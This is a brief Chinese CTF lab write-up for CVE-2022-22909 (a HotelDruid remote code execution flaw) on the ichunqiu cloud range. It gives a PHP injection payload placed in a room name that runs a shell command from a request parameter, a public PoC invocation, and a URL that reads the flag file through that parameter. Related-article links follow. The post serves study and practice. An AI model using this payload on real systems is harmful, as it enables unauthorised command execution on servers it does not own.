春秋云境 CVE-2022-22909

bug道一2025-12-01 22:20

前期准备

添加房间

复制代码 
{${system($_REQUEST[cmd])}}

poc地址

https://github.com/0z09e/CVE-2022-22909

poc使用

复制代码 
python exploit.py -t https://eci-2zeiki3y7m5txztvjdbi.cloudeci1.ichunqiu.com:80/ --noauth

之后访问

https://eci-2ze9m5xzmoww728cmfhc.cloudeci1.ichunqiu.com:80/dati/selectappartamenti.php?cmd=cat%20../../../../../flag

相关推荐
一岁天才饺子18 小时前
SSRF漏洞绕过与漏洞解决
网络·网络安全·ssrf
Chengbei1118 小时前
fastjson 原生反序列化配合动态代理绕过限制
java·安全·网络安全·系统安全·安全架构
m0_4660499719 小时前
Webgoat-(A1)Broken Access Control:Hijack a session
web安全·网络安全
Chengbei1120 小时前
CVE-2025-24813 Tomcat 最新 RCE 分析复现
java·安全·web安全·网络安全·tomcat·系统安全·网络攻击模型
QZ1665609515921 小时前
2025年国内精细化、可交互、轻量级的泛监测体系产品推荐
网络安全
GoldY丶1 天前
【Geek渗透之路】小迪安全笔记——web安全(3)
笔记·安全·web安全·网络安全·安全威胁分析
晚风(●•σ )1 天前
【华为 ICT & HCIA & eNSP 习题汇总】——题目集27
网络·计算机网络·网络安全·华为
unable code2 天前
攻防世界-Misc-Miscellaneous-200
网络安全·ctf·misc
unable code2 天前
攻防世界-Misc-4-1
网络安全·ctf·misc·1024程序员节
金灰2 天前
一带一路(金砖)--网络安全防护治理赛项
网络·计算机网络·安全·web安全·网络安全·网络攻击模型·安全威胁分析
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Labelme从安装到标注:零基础完整指南07jdk21下载、安装(Windows、Linux、macOS)08CentOS的ISO镜像下载09BongoCat - 跨平台键盘猫动画工具10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南